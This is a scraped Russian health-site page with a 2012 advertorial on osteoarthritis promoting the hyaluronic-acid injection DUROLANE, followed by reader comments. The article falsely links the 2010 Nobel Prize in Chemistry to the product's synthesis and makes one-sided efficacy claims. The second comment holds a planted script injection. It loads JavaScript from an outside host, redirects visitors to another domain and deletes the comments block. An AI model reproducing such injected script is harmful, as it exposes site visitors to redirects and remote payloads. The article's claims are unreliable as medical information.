Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новая жизнь суставов при ...  >>  Новая жизнь суставов при остеоартрозе
 
Обратная связь
 

Новая жизнь суставов при остеоартрозе

Размер шрифта
23 апреля 2012 10:59
  • google_analytics: false
  • Нравится

Остеоартроз – болезнь суставов и одно из наиболее древних заболеваний человека и позвоночных животных. Что такое остеоартроз, и как его лечить?

Суть заболевания

Дегенеративное изменение хрящей и суставных поверхностей, ведущее к разрушению суставов называется остеоартрозом (от греческих слов: «остеон» – кость и «артрон» – сустав).

Со временем или под влиянием чрезмерных нагрузок любые суставы в организме изменяются, и может развиться остеоартроз, или артроз, который приводит к деформации суставов. Различают артроз многих суставов (полиостеартроз) и артрозы отдельных суставов: коленного – гонартроз, тазобедренного – коксартроз, голеностопного – крузартроз и т.д. Наиболее редко встречается артроз плечевого сустава. Могут изменяться даже суставы позвоночника. Межпозвоночные диски при этом становятся тоньше, теряют упругость и меньше защищают позвонки от трения. Развивается спондилоартроз – артроз позвоночника.

Причины и факторы риска

  • Наследственная предрасположенность
  • Дефекты в развитии сустава (дисплазия)
  • Травмы
  • Избыточный вес
  • Возраст
  • Нарушение баланса гормонов (например, нарушение секреции эстрогенов в постменопаузе)
  • Нарушение обмена веществ
  • Дефицит микроэлементов
  • Воспаление, повреждающее сустав вследствие аутоиммунных заболеваний (например, ревматоидного артрита), но иногда имеет инфекционную природу
  • Переохлаждение
  • Повышенная длительная физическая нагрузка или изнуряющий труд

Перечисленные выше причины и факторы риска приводят к развитию заболевания, которое начинается с изменений в структуре суставного хряща.

Симптомы

Со временем развивается ряд симптомов, тяжесть которых зависит от степени заболевания.

Это могут быть отдельные симптомы или симптомокомплекс:

  • Болевой синдром, который может усиливаться от сырости и холода, а также при длительной нагрузке
  • Хруст в суставе
  • Чувство дискомфорта в суставе
  • Плохая подвижность или скованность сустава
  • Ощущение ломоты в суставе
  • Деформация сустава
  • Мышечная атрофия на поздней стадии болезни

Что делать

Сохранить структуру суставного хряща возможно, если поддерживать необходимый уровень и качество гиалуроновой кислоты в организме. Для этой цели были разработаны препараты гиалуроновой кислоты для внутрисуставного введения – «заменители» внутрисуставной жидкости. Именно они облегчают жизнь больных и позволяют отсрочить эндопротезирование.

В настоящее время рынок таких препаратов переполнен – около 100 торговых наименований. Для результата необходим курс от 3 до 5 внутрисуставных инъекций. Курс может продолжаться от 3 до 5 недель. Это отягчает жизнь и повышает возможность инфекции. Кроме того, не каждый производитель может гарантировать эффективность и безопасность препаратов.

ДЬЮРАЛАН – гиалуроновая кислота, созданная с применением высоких технологий и передовой научной мысли, единственный в мире препарат, производимый по запатентованной биотехнологии NASHA. Данная биотехнология позволяет сократить сроки лечения и избежать побочных реакций. За разработку особого органического синтеза, используемого создателями препарата ДЬЮРАЛАН, авторы (Richard F. Heck, Ei-ichi Negishi, Akira Suzuki) были удостоены в 2010 году Нобелевской премии в области химии.

На сегодняшний день ДЬЮРАЛАН успешно применяется в странах Европы и США. ДЬЮРАЛАН – единственный из препаратов гиалуроновой кислоты, включенный в список обязательных лекарственных средств для лечения остеоартроза, в Великобритании.

ДЬЮРАЛАН зарегистрирован и сертифицирован на территории Российской Федерации, соответствует стандартам безопасности Евросоюза, одобрен к применению американским Управлением по контролю за лекарственными средствами.

ДЬЮРАЛАН выпускается в готовых шприцах по 3 мл (для крупных суставов) и по 1 мл (для мелких суставов).

Всего одна внутрисуставная инъекция ДЬЮРАЛАНА значительно уменьшает боль и возвращает утраченную подвижность сустава на 6-12 месяцев.

Высокая эффективность и длительность действия ДЬЮРАЛАНА, его безопасность позволяют считать его препаратом выбора в комплексном лечении остеоартроза.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

11 мая 2013 в 07:25

Цитировать   |   Пожаловаться

это гормональный препарат?

2 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшие лекарства от боли в суставах   История пациента. Максим, горнолыжник   История пациента. Александр, вело-спортсмен   История пациента. Владимир, менеджер банка  
07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав! 30 июня 2011Остеоартрит чаще всего встречается у военных
 
19 декабря 2012Газированные напитки увеличивают риск артрита 08 ноября 2012Обычная вишня может спасти от боли в ногах
 

Слайдшоу

1
Вся правда о ревматоидном артрите
Вся правда об остеоартрозе
Как сохранить здоровье суставов

Тесты

Есть ли у вас остеопороз?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.